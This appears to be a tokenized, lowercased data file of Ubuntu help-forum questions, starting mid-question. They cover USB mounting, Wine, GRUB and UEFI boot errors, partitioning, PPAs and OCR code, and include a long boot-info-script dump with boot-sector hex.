`` silicon motion , inc. '' line represents the patriot 32 gb stick in question . could i please know what might be missing in this case ? to mount the drive , i do n't see any reference to sda in the dmesg logs . any help is greatly appreciated . thank you thefourtheye for the quick response , here it is : root @ ubuntu : /etc/udev/rules.d # fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2e49cc03 device boot start end blocks id system /dev/sda1 2048 31459327 15728640 27 hidden ntfs winre /dev/sda2 * 31459328 31664127 102400 7 hpfs/ntfs/exfat /dev/sda3 31664128 528005119 248170496 7 hpfs/ntfs/exfat ubuntu , here is the result of ehci_hcd attempt : root @ ubuntu : /etc/udev/rules.d # sudo rmmod ehci_hcd error : module ehci_hcd does not exist in /proc/modules root @ ubuntu : ~ # sudo modprobe ehci_hcd root @ ubuntu : ~ # root @ ubuntu : ~ # sudo rmmod ehci_hcd error : module ehci_hcd does not exist in /proc/modules
296989	run .bat via wine cmd	i tried to run .bat file , but got unknown error : $ wine cmd cmd version 1.4 z : \home\setevoy\temp\zork1 > start zork1.bat fixme : exec : shell_execute flags ignored : 0x00000100 z : \home\setevoy\temp\zork1 > winevdm : can not start dos application z : \home\setevoy \temp\zork1\nnansi.com because the dos memory range is unavailable . try running this application with dosbox . winevdm : can not start dos application z : \home\setevoy\temp\zork1\_zork1.com because the dos memory range is unavailable . can somebody please explain me - what i 'm doing wrong ? thanks .
296994	how to get the tp-link tl-wn723n working on ubuntu ?	how do i get the tp-link tl-wn723n wireless adapter to work on ubuntu . and also if i do modify it to work , will its stop working in windows ?
296995	grub2 c/h/s value error on laptop second hard drive ( odd )	i was living happily with my one hard drive in laptop then i installed a ssd as my first ( hd0 ) then installed the old drive in laptop 's second hard drive caddy in cd/dvd drive bay . now i ca n't boot in my old drive os , i am getting c/h/s values error , in bios there are no options for second hard drive ( dell inspiron n5010 , bios version a15 ) i know very little about grub so here 's some outputs . grub.cfg fdisk -l blkid
296996	how can i backup the whole system status ( not documents ) ?	i want to backup my system status , like installed packeges what 's on my sidebar grub settings kernel ... in order to restore it in case of system crash . i do n't care about my document , music , files ( /home , i suppose ) . what directories do i have to select in the backup apart from /etc ?
296997	deleted ang0 and ang1	i accidentally deleted ang0 and ang1 from my pc . i was dual-booting ubuntu with windows 8 as default . how do i repair it ? i installed ubuntu with unetbootin .
297001	how do i get a higher resolution than 1280 x 800 in ubuntu 13.04	i have installed ubuntu 13.04 on a dell inspiron 1520 that has an nvidia g84m graphics card i have followed the instructions from this link how to install the nvidia drivers and i installed the recommended nvidia-319 package but i am still stuck with 1280 x800 as the maximum resolution running windows 7 in virtualbox i can get a resolution of 1600 x 1200 so the issue appears in ubuntu does anyone have any suggestions ? thanks in advance
297006	how do i set mate 1.6 to use compiz ?	mate desktop has recently migrated , as of version 1.6 , from using mateconf-editor to gsettings . this breaks traditional solutions for changing mate 's window manager to compiz .
297008	how to install synaptic package manager that i have already downloaded the package using windows ?	i have downloaded the synaptic package manager using windows7 . i only just installed ubuntu recently . i heard that synaptic can help me in installing software since using the terminal is very difficult . then i searched for synaptic in dash home but i ca n't find it . i downloaded the synaptic package . can you please help me installing synaptic offline ? thanks in advance
297015	running compiz on ubuntu-studio	i 've installed ubuntu studio , and includes xfce4 . i 've installed compiz , but do n't know how to use it . can i use compiz ?
297020	how do i view contents of android ( 4.1.2 ) folders on ubuntu ?	hello askubuntu community ! i am hoping you will be able to help me , or help me help you help me ! i am trying to access my music stored on the external microsd card on my samsung android sgh-t699 via usb . when i connect the phone to usb port , i get the pop up `` unable to mount samsung android sgh-t699 '' `` error initializing camera : -60 : could not lock the device . '' i just hit okay , and i can still view the folders on both the phone , and the ext_sd . when i click on a folder , it goes into the directory , but does not display any of it the contents that are in it . now a couple of weeks ago , i was able to put music on my phone , and read and write onto it ( even with the error pop-up ) just fine . then i got an update , and it now it will not display any of the contents of the phone , or sd card . any help would be appreciated ! i have tried a google search . many people seemed to have similar problems with their phone and ubuntu . their solutions , either did not work , or they had a different version with different options . like ics vs jellybean . android developer options , usb debugging . debian os and same problem . i do not have any other computer to try , and no other oses installed . listing with hidden view enabled . let me know if you need more information . thank you in advance .
297021	is it possible to use amazon glacier as backup target for clonezilla ?	if i boot up a system with the clonezilla livecd , is it possible to create a image of an entire disk and upload it to amazon glacier ? edit : maybe my question could be misunderstood . i know that it is possible to create images of entire disks with clonezilla . the question is , if clonezilla is also able to store the generated disk image on amazon glacier , without the need to have a device/disk space for storing the temporary disk image on it .
297023	performance of chrome hangouts extension	i just installed the chrome extension for google hangouts . since then , i experience a lot more cpu usage of the chrome process ( es ) . up to 100 % at times ! does anyone else experience similar issues ? is this a bug of chrome under linux ? or is there the same issue on other operationg systems ? just for reference : i have an intel i5 with 4 cores .
297029	automount with async option	i have a 1 tb western digital external harddisk . the read/write speed was very low , i read on askubuntu that using the async mount option helps . then i started using it as follows : mount -o async , rw /dev/sdb1 /media/a/ every time i plugin the hdd , i first unmount it then go to command line to mount it using the above command . i also have a 16gb pendrive and that is slower on ubuntu than windows 7 , i suspect using async could help me there as well . what does async do ? is there a way to make async as the default option during automounts ? is it advisable to do so ?
297034	convertion of tiff image in python script - ocr using tesseract	i want to convert a tiff image file to text document . my code perfectly as i expected to convert tiff images with usual font but its not working for french script font . my tiff image file contains text . the font of text is in french script format.i here is my code import image import subprocess import util import errors tesseract_exe_name = 'tesseract ' # name of executable to be called at command line scratch_image_name = `` temp.bmp '' # this file must be .bmp or other tesseract-compatible format scratch_text_name_root = `` temp '' # leave out the .txt extension cleanup_scratch_flag = true # temporary files cleaned up after ocr operation def call_tesseract ( input_filename , output_filename ) : `` '' '' calls external tesseract.exe on input file ( restrictions on types ) , outputting output_filename+'txt ' '' '' '' args = [ tesseract_exe_name , input_filename , output_filename ] proc = subprocess.popen ( args ) retcode = proc.wait ( ) if retcode ! =0 : errors.check_for_errors ( ) def image_to_string ( im , cleanup = cleanup_scratch_flag ) : `` '' '' converts im to file , applies tesseract , and fetches resulting text . if cleanup=true , delete scratch files after operation . '' '' '' try : util.image_to_scratch ( im , scratch_image_name ) call_tesseract ( scratch_image_name , scratch_text_name_root ) text = util.retrieve_text ( scratch_text_name_root ) finally : if cleanup : util.perform_cleanup ( scratch_image_name , scratch_text_name_root ) return text def image_file_to_string ( filename , cleanup = cleanup_scratch_flag , graceful_errors=true ) : if cleanup=true , delete scratch files after operation . '' '' '' try : try : call_tesseract ( filename , scratch_text_name_root ) text = util.retrieve_text ( scratch_text_name_root ) except errors.tesser_general_exception : if graceful_errors : im = image.open ( filename ) text = image_to_string ( im , cleanup ) else : raise finally : if cleanup : util.perform_cleanup ( scratch_image_name , scratch_text_name_root ) return text if __name__=='__main__ ' : im = image.open ( `` /home/oomsys/phototest.tif '' ) text = image_to_string ( im ) print text try : text = image_file_to_string ( 'fnord.tif ' , graceful_errors=false ) except errors.tesser_general_exception , value : print `` fnord.tif is incompatible filetype . try graceful_errors=true '' print value text = image_file_to_string ( 'fnord.tif ' , graceful_errors=true ) print `` fnord.tif contents : '' , text text = image_file_to_string ( 'fonts_test.png ' , graceful_errors=true ) print text
297041	skype-call-recorder keeps showing up legal information	i 've installed skype-call-recorder . on first call , legal information window popped up notifying me about legal stuff . i checked dont show again option . however , every time i restart pc , it shows again . i 'm using ubuntu 12.04 . thanks in advance !
297042	grub rescue unknown file system error	i formatted my partition of ubuntu 11.04 and created a new simple volume in windows . but when i rebooted my laptop , i got an error : no such partition . i tried nearly all commands suggested , but could not find a way out . when i type ls it shows : ( hd0 ) , ( hd0 , msdos7 ) , ( hd0 , msdos6 ) , ( hd0 , msdos5 ) , ( hd0 , msdos3 ) , ( hd0 , msdos2 ) , ( hd0 , msdos1 ) when i use any of them with ls command individually , i 'm returned unknown file system error . when i tried setting each one as a prefix and root i had problem with insmod . when i try to use insmod , i 'm prompted with error : unknown filesystem . i 've tried setting either of these as prefix and then root , but whenever i try to insmod i 'm prompted with the same error : unknown filesystem .
297046	how can i determine the sudo password ?	what is the default password of the sudo ? i visit some forums , it tells that the default password is password , but it does n't work , how can i determine the password ?
297052	need help adding a ppa	this is the command i am typing in the terminal . sudo add-apt-repository ppa : gregory-halnaut/pcsx2.official.ppa and this is the reply i am getting . can not access ppa ( https : //launchpad.net/api/1.0/~gregory-halnaut/+archive/pcsx2.official.ppa ) to get ppa information , please check your internet connection . the internet connection is fine . can anyone help me ? i need bios roms for the pcsx2 emulator and in a tutorial on youtube i saw that i had to execute this command .
297053	where are all ubuntu logs/terminal history stored	in what folders are the logs and key histories stored so that i may make a script to purge them . is there a specific folder for the hibernation partition or a file by which it keeps the ram data on hibernate ? is someone wanted to rid of all command history/program load history/program execution history , where would they go ? thankx light
297056	how can i change partition table without data loss ?	i hope that i name it that right . i have a root partition a home partition and swap . all i want is to add a partition for windows . but my drive is full so i want to shrink the logical home partition 900gb and then assign the 100 gb to windows ntfs . the problem is that the home partition is under extended and when i shrink it the 100 gb for windows is under extended too . i can not get it to primary , always logical . how can i change this without data loss ? i do not have external drive to empty my drive . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003ead5 device boot start end blocks id system /dev/sda1 * 2048 39064547 19531250 83 linux /dev/sda2 39065598 1945712084 953323243+ 5 extended /dev/sda3 1945712640 1953525139 3906250 82 linux swap / solaris /dev/sda5 39065600 1740912639 850923520 83 linux /dev/sda6 1740914688 1945710591 102397952 6 fat16 thanks
297062	software center crash , sources.list error 13.04	i 'm having a problem with software center since i tried to add spotify repositories to sources.list . it does n't open at all . i tried reinstalling software center , but it sends this error : e : type âťhttp : //repository.spotify.comâť is not known on line 59 in source list /etc/apt/sources.list i 'm not sure if this is the real problem , but apart from this everything seems to be ok .
297063	grub2 : when i choose windows 8 , error invalid efi file path	i had a problem with install ubuntu 13.04 next to windows 8 . i have a dell inspiron 15 notebook with uefi . in boot-setup i changed to legacy boot on and switched uefi boot off . then i installed ubuntu but the computer always starts windows . i have followed the instructions here : uefi but it has n't helped . i used boot-repair and it helped ; but it did not list windows 8 in grub . then i wrote with qgrubeditor windows 8 . now when i turn on my notebook in grub i have windows 8 listed but if i choose it i get the error invalid efi file path . what can i do to fix this ? boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > no boot loader is installed in the mbr of /dev/sda . sda1 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . operating system : boot files : sda2 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . operating system : boot files : sda3 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : nieznany typ systemu plików '' sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /windows/system32/winload.exe sda6 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda7 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda7 and looks at sector 1565267170 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . operating system : ubuntu 13.04 boot files : /etc/fstab sda8 : __________________________________________________________________________ file system : bios boot partition boot sector type : - boot sector info : sda9 : __________________________________________________________________________ file system : ext2 boot sector type : - boot sector info : operating system : boot files : /grub/grub.cfg sda10 : _________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes głowic : 255 , sektorów/ścieżkę : 63 , cylindrów : 121601 , w sumie sektorów : 1953525168 jednostka = sektorów , czyli 1 * 512 = 512 bajtów rozmiar sektora ( logiczny/fizyczny ) w bajtach : 512 / 4096 partition boot start sector end sector # of sectors id system /dev/sda1 1 1,953,525,167 1,953,525,167 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 1,026,047 1,024,000 efi system partition /dev/sda2 1,026,048 1,107,967 81,920 - /dev/sda3 1,107,968 1,370,111 262,144 microsoft reserved partition ( windows ) /dev/sda4 1,370,112 2,394,111 1,024,000 windows recovery environment ( windows ) /dev/sda5 2,394,112 783,624,580 781,230,469 data partition ( windows/linux ) /dev/sda6 1,926,948,864 1,953,523,119 26,574,256 windows recovery environment ( windows ) /dev/sda7 783,644,672 1,564,895,231 781,250,560 data partition ( windows/linux ) /dev/sda8 783,626,240 783,644,671 18,432 bios boot partition /dev/sda9 1,564,895,232 1,565,382,655 487,424 data partition ( windows/linux ) /dev/sda10 1,565,382,656 1,565,407,231 24,576 swap partition ( linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 2081-d15d vfat esp /dev/sda10 0610ae9a-1d01-413b-ac3d-0d9bfe8d5377 swap /dev/sda2 e0ed-c674 vfat diags /dev/sda4 981cef4c1cef244a ntfs winretools /dev/sda5 5804f37604f3558a ntfs os /dev/sda6 768a92cb8a928771 ntfs pbr image /dev/sda7 bbc0df4a-6a25-44fd-95c9-e358bfafe048 ext4 /dev/sda9 4a8e05e5-da38-4b8d-a62b-7a65bac91c79 ext2 ================================ mount points : ================================= device mount_point type options /dev/sda1 /boot/efi vfat ( rw ) /dev/sda7 / ext4 ( rw , errors=remount-ro ) /dev/sda9 /boot ext2 ( rw ) =============================== sda7/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda7 during installation uuid=bbc0df4a-6a25-44fd-95c9-e358bfafe048 / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda9 during installation # uuid=4a8e05e5-da38-4b8d-a62b-7a65bac91c79 /boot ext2 defaults 0 2 # swap was on /dev/sda10 during installation uuid=0610ae9a-1d01-413b-ac3d-0d9bfe8d5377 none swap sw 0 0 uuid=4a8e05e5-da38-4b8d-a62b-7a65bac91c79 /boot ext2 defaults 0 2 uuid=2081-d15d /boot/efi vfat defaults 0 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda7 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = initrd.img 68 = initrd.img.old 68 = vmlinuz 24 ============================= sda9/grub/grub.cfg : ============================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt7' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt7 -- hint-efi=hd0 , gpt7 -- hint-baremetal=ahci0 , gpt7 bbc0df4a-6a25-44fd-95c9-e358bfafe048 else search -- no-floppy -- fs-uuid -- set=root bbc0df4a-6a25-44fd-95c9-e358bfafe048 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=pl_pl insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-bbc0df4a-6a25-44fd-95c9-e358bfafe048 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 4a8e05e5-da38-4b8d-a62b-7a65bac91c79 else search -- no-floppy -- fs-uuid -- set=root 4a8e05e5-da38-4b8d-a62b-7a65bac91c79 fi linux /vmlinuz-3.8.0-19-generic root=uuid=bbc0df4a-6a25-44fd-95c9-e358bfafe048 ro quiet splash $ vt_handoff initrd /initrd.img-3.8.0-19-generic } submenu 'opcje zaawansowane dla systemu ubuntu ' $ menuentry_id_option 'gnulinux-advanced-bbc0df4a-6a25-44fd-95c9-e358bfafe048 ' { menuentry 'ubuntu , za pomocą systemu linux 3.8.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-advanced-bbc0df4a-6a25-44fd-95c9-e358bfafe048 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 4a8e05e5-da38-4b8d-a62b-7a65bac91c79 else search -- no-floppy -- fs-uuid -- set=root 4a8e05e5-da38-4b8d-a62b-7a65bac91c79 fi echo 'wczytywanie systemu linux 3.8.0-19-generic ... ' linux /vmlinuz-3.8.0-19-generic root=uuid=bbc0df4a-6a25-44fd-95c9-e358bfafe048 ro quiet splash $ vt_handoff echo 'wczytywanie początkowego dysku ram ... ' initrd /initrd.img-3.8.0-19-generic } menuentry 'ubuntu , za pomocą systemu linux 3.8.0-19-generic ( tryb ratunkowy ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-recovery-bbc0df4a-6a25-44fd-95c9-e358bfafe048 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 4a8e05e5-da38-4b8d-a62b-7a65bac91c79 else search -- no-floppy -- fs-uuid -- set=root 4a8e05e5-da38-4b8d-a62b-7a65bac91c79 fi echo 'wczytywanie systemu linux 3.8.0-19-generic ... ' linux /vmlinuz-3.8.0-19-generic root=uuid=bbc0df4a-6a25-44fd-95c9-e358bfafe048 ro recovery nomodeset echo 'wczytywanie początkowego dysku ram ... ' initrd /initrd.img-3.8.0-19-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # menuentry 'system setup ' $ menuentry_id_option 'uefi-firmware ' { fwsetup } # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda9 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = grub/grub.cfg 1 = initrd.img-3.8.0-19-generic 68 = vmlinuz-3.8.0-19-generic 24 ======================== unknown mbrs/boot sectors/etc : ======================== unknown gpt partiton type d3ad6b79bf6b9f4db631466eb71a4965 unknown bootloader on sda1 00000000 eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 08 3e 18 |.x.msdos5.0 ... > .| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 00 08 00 00 | ... ... .. ? ... ... .| 00000020 00 a0 0f 00 e1 03 00 00 00 00 00 00 02 00 00 00 | ... ... ... ... ... .| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 80 00 29 5d d1 81 20 4e 4f 20 4e 41 4d 45 20 20 |.. ) ] .. no name | 00000050 20 20 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 | fat32 3 ... ..| 00000060 7b 8e c1 8e d9 bd 00 7c 88 56 40 88 4e 02 8a 56 | { ... ... |.v @ .n..v| 00000070 40 b4 41 bb aa 55 cd 13 72 10 81 fb 55 aa 75 0a | @ .a..u..r ... u.u.| 00000080 f6 c1 01 74 05 fe 46 02 eb 2d 8a 56 40 b4 08 cd | ... t..f..-.v @ ... | 00000090 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f b6 |.s ... ... f ... @ f..| 000000a0 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 c9 | ... ? ... ... .af ... | 000000b0 66 f7 e1 66 89 46 f8 83 7e 16 00 75 39 83 7e 2a |f..f.f..~..u9.~*| 000000c0 00 77 33 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 01 |.w3f.f.f ... ... ..| 000000d0 00 e8 2c 00 e9 a8 03 a1 f8 7d 80 c4 7c 8b f0 ac |.. , ... ... } ..| ... | 000000e0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t. < .t ... ... ... | 000000f0 ee a1 fa 7d eb e4 a1 7d 80 eb df 98 cd 16 cd 19 | ... } ... } ... ... ..| 00000100 66 60 80 7e 02 00 0f 84 20 00 66 6a 00 66 50 06 |f`.~ ... . .fj.fp.| 00000110 53 66 68 10 00 01 00 b4 42 8a 56 40 8b f4 cd 13 |sfh ... ..b.v @ ... .| 00000120 66 58 66 58 66 58 66 58 eb 33 66 3b 46 f8 72 03 |fxfxfxfx.3f ; f.r.| 00000130 f9 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe c2 |..*f3.f..n.f ... .| 00000140 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a 56 |..f..f ... .v ... .v| 00000150 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 0f | @ ... ... ... ... fa.| 00000160 82 74 ff 81 c3 00 02 66 40 49 75 94 c3 42 4f 4f |.t ... ..f @ iu..boo| 00000170 54 4d 47 52 20 20 20 20 00 00 00 00 00 00 00 00 |tmgr ... ... ..| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 44 69 | ... ... ... ... ..di| 000001b0 73 6b 20 65 72 72 6f 72 ff 0d 0a 50 72 65 73 73 |sk error ... press| 000001c0 20 61 6e 79 20 6b 65 79 20 74 6f 20 72 65 73 74 | any key to rest| 000001d0 61 72 74 0d 0a 00 00 00 00 00 00 00 00 00 00 00 |art ... ... ... ... .| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 ac 01 b9 01 00 00 55 aa | ... ... ... ... ..u.| 00000200 unknown bootloader on sda2 00000000 eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 01 7e 1b |.x.msdos5.0 ... ~.| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 00 a8 0f 00 | ... ... .. ? ... ... .| 00000020 00 40 01 00 41 02 00 00 00 00 00 00 02 00 00 00 | . @ ..a ... ... ... ..| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 80 00 29 74 c6 ed e0 4e 4f 20 4e 41 4d 45 20 20 |.. ) t ... no name | 00000050 20 20 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 | fat32 3 ... ..| 00000060 7b 8e c1 8e d9 bd 00 7c 88 56 40 88 4e 02 8a 56 | { ... ... |.v @ .n..v| 00000070 40 b4 41 bb aa 55 cd 13 72 10 81 fb 55 aa 75 0a | @ .a..u..r ... u.u.| 00000080 f6 c1 01 74 05 fe 46 02 eb 2d 8a 56 40 b4 08 cd | ... t..f..-.v @ ... | 00000090 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f b6 |.s ... ... f ... @ f..| 000000a0 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 c9 | ... ? ... ... .af ... | 000000b0 66 f7 e1 66 89 46 f8 83 7e 16 00 75 39 83 7e 2a |f..f.f..~..u9.~*| 000000c0 00 77 33 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 01 |.w3f.f.f ... ... ..| 000000d0 00 e8 2c 00 e9 a8 03 a1 f8 7d 80 c4 7c 8b f0 ac |.. , ... ... } ..| ... | 000000e0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t. < .t ... ... ... | 000000f0 ee a1 fa 7d eb e4 a1 7d 80 eb df 98 cd 16 cd 19 | ... } ... } ... ... ..| 00000100 66 60 80 7e 02 00 0f 84 20 00 66 6a 00 66 50 06 |f`.~ ... . .fj.fp.| 00000110 53 66 68 10 00 01 00 b4 42 8a 56 40 8b f4 cd 13 |sfh ... ..b.v @ ... .| 00000120 66 58 66 58 66 58 66 58 eb 33 66 3b 46 f8 72 03 |fxfxfxfx.3f ; f.r.| 00000130 f9 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe c2 |..*f3.f..n.f ... .| 00000140 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a 56 |..f..f ... .v ... .v| 00000150 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 0f | @ ... ... ... ... fa.| 00000160 82 74 ff 81 c3 00 02 66 40 49 75 94 c3 42 4f 4f |.t ... ..f @ iu..boo| 00000170 54 4d 47 52 20 20 20 20 00 00 00 00 00 00 00 00 |tmgr ... ... ..| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 44 69 | ... ... ... ... ..di| 000001b0 73 6b 20 65 72 72 6f 72 ff 0d 0a 50 72 65 73 73 |sk error ... press| 000001c0 20 61 6e 79 20 6b 65 79 20 74 6f 20 72 65 73 74 | any key to rest| 000001d0 61 72 74 0d 0a 00 00 00 00 00 00 00 00 00 00 00 |art ... ... ... ... .| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 ac 01 b9 01 00 00 55 aa | ... ... ... ... ..u.| 00000200 ========= devices which do n't seem to have a corresponding hard drive : ========= sdb =============================== stderr messages : =============================== awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in
